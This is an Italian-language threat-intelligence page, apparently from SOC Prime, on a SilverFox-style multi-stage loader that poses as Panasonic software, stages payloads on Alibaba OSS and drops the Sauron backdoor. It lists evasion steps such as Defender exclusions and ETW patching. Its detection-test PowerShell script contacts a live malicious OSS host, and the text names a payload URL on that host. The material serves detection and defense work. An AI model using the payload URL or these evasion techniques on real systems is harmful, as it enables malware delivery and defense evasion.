SOC Prime Bias: High

24 Jun 2026 18:35 UTC

Catena di caricamento in stile SilverFox utilizza Panasonic Shells, Alibaba OSS e Sauron

Author Photo
SOC Prime Team linkedin icon Segui
Catena di caricamento in stile SilverFox utilizza Panasonic Shells, Alibaba OSS e Sauron
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Questa minaccia si concentra su una catena di caricamento multifase altamente sofisticata, mascherata come software legittimo di Panasonic. Il malware utilizza Alibaba OSS per fornire payload e si basa su vettori cifrati basati su immagini che utilizzano un caratteristico formato trailer EOF a cinque byte. La sua fase finale distribuisce il backdoor Sauron, che mantiene la persistenza attraverso la creazione di servizi e modifiche mirate al registro.

Indagine

Gli analisti hanno condotto sia analisi statiche che dinamiche e hanno scoperto una sequenza di operazioni di side-loading che coinvolgono binari etichettati come software di Tencent e Philips. L’indagine ha esposto una routine di decrittazione stratificata che utilizza incrementando XOR e RC4, insieme alla creazione di attività pianificate tramite meccanismi RPC. La forensi della memoria e la telemetria sandbox hanno aiutato a ricostruire il percorso completo di esecuzione, dal wrapper iniziale a tema Panasonic al backdoor finale Sauron.

Mitigazione

Le organizzazioni dovrebbero monitorare la pianificazione non autorizzata di attività basate su RPC e la creazione sospetta di attività pianificate tramite NdrClientCall3. Un forte allowlisting delle applicazioni può aiutare a bloccare l’esecuzione di DLL side-loaded non approvate. I difensori dovrebbero anche prestare attenzione all’eliminazione inattesa delle copie shadow del volume e alle modifiche del registro sospette sotto HKCUSOFTWARE.

Risposta

Se viene rilevata questa attività, isolare immediatamente i sistemi interessati per interrompere ulteriori movimenti laterali o comunicazioni di comando e controllo. Effettuare analisi della memoria per identificare i moduli iniettati e determinare lo stadio attuale della catena di caricamento. Anche i log di rete dovrebbero essere esaminati per il traffico verso l’infrastruttura Alibaba OSS e gli indirizzi IP di comando e controllo noti identificati durante il triage.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious["<b>Action</b> – <b id='T1204.002'>User Execution: Malicious File</b><br/><b>File</b>: ainstaller-86533005.exe<br/><b>Description</b>: User executes trojanized executable<br/>disguised as Panasonic PC Notification software."] class exec_user_malicious action %% Obfuscation and Masquerading obf_files["<b id='T1027'>Obfuscated Files or Information</b><br/><b>Technique</b>: Multi-layer staged buffers<br/><b>Mechanism</b>: Custom XOR/RC4 decoding<br/><b>Extraction</b>: Five-byte EOF trailer from image carriers."] class obf_files malware mask_file_type["<b id='T1036.008'>Masquerading: Masquerade File Type</b><br/><b>Description</b>: Using image extensions (gif, jpg, png, db)<br/>to hide encrypted payloads."] class mask_file_type evasion %% Proxy Execution proxy_sys_bin["<b id='T1218'>System Binary Proxy Execution</b><br/><b>Target 1</b>: Tencent UxEnhanceHost loading UxEnhance64.dll<br/><b>Target 2</b>: Philips/Speech Processing Solutions host loading XPSPLOG.dll"] class proxy_sys_bin action %% Persistence persist_sched_task["<b id='T1053.005'>Scheduled Task/Job: Scheduled Task</b><br/><b>Module</b>: VirtuOne<br/><b>Mechanism</b>: RPC calls to Task Scheduler via \pipeatsvc<br/><b>Goal</b>: Create hidden repeating tasks."] class persist_sched_task persistence %% Defense Evasion evade_def_impair["<b id='T1685'>Defense Impairment</b><br/><b>Action</b>: Patching ntdll.dll!NtTraceEvent"] class evade_def_impair evasion evade_selective_excl["<b id='T1679'>Selective Exclusion</b><br/><b>Tool</b>: PowerShell<br/><b>Command</b>: Add-MpPreference -ExclusionPath<br/><b>Goal</b>: Add Windows Defender exclusions."] class evade_selective_excl evasion %% Final Stage proxy_rundll32["<b id='T1218.011'>System Binary Proxy Execution: Rundll32</b><br/><b>File</b>: rundll32.dat<br/><b>Export</b>: Edge<br/><b>Action</b>: Installs and starts malicious service."] class proxy_rundll32 action malware_sauron["<b id='Malware'>Malware: Sauron</b><br/><b>Type</b>: Malicious Service<br/><b>Capability

Flusso di Attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo Telemetria & Baseline deve essere superato.

Razionale: Questa sezione dettaglia la precisa esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa dell’Attacco & Comandi: L’avversario cerca di scaricare un payload di seconda fase utilizzando un servizio di archiviazione cloud legittimo per mimetizzarsi con il traffico normale. L’attaccante utilizza un one-liner PowerShell per simulare un caricatore che effettua una richiesta a un URL conosciuto SilverFox Alibaba OSS: https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. Questa azione è intesa a bypassare filtri di dominio semplici sfruttando la reputazione di aliyuncs.com mentre si utilizza il percorso specifico malevolo definito nella regola di rilevamento.

  • Script di Test di Regressione:

    # Simulazione di Indicatore di Rete del Caricatore SilverFox
    # Questo script tenta di connettersi all'URL specifico monitorato dalla regola Sigma.
    
    $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt"
    Write-Host "[!] Simulazione di connessione di rete SilverFox a: $targetUrl"
    
    try {
        # Utilizzando Invoke-WebRequest per generare la telemetria HTTP proxy standard
        $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing
        Write-Host "[+] Richiesta completata. Codice di Stato: $($response.StatusCode)"
    }
    catch {
        # Ci aspettiamo un errore 404 o di connessione se l'URL non ospita effettivamente un file,
        # ma il log proxy registrerà comunque il tentativo.
        Write-Host "[-] Richiesta tentata. Controllare i log proxy per il tentativo di connessione."
    }
  • Comandi di Pulizia:

    # Nessun cambiamento persistente apportato da questa simulazione; nessuna pulizia richiesta.
    Write-Host "[*] Pulizia simulazione completata."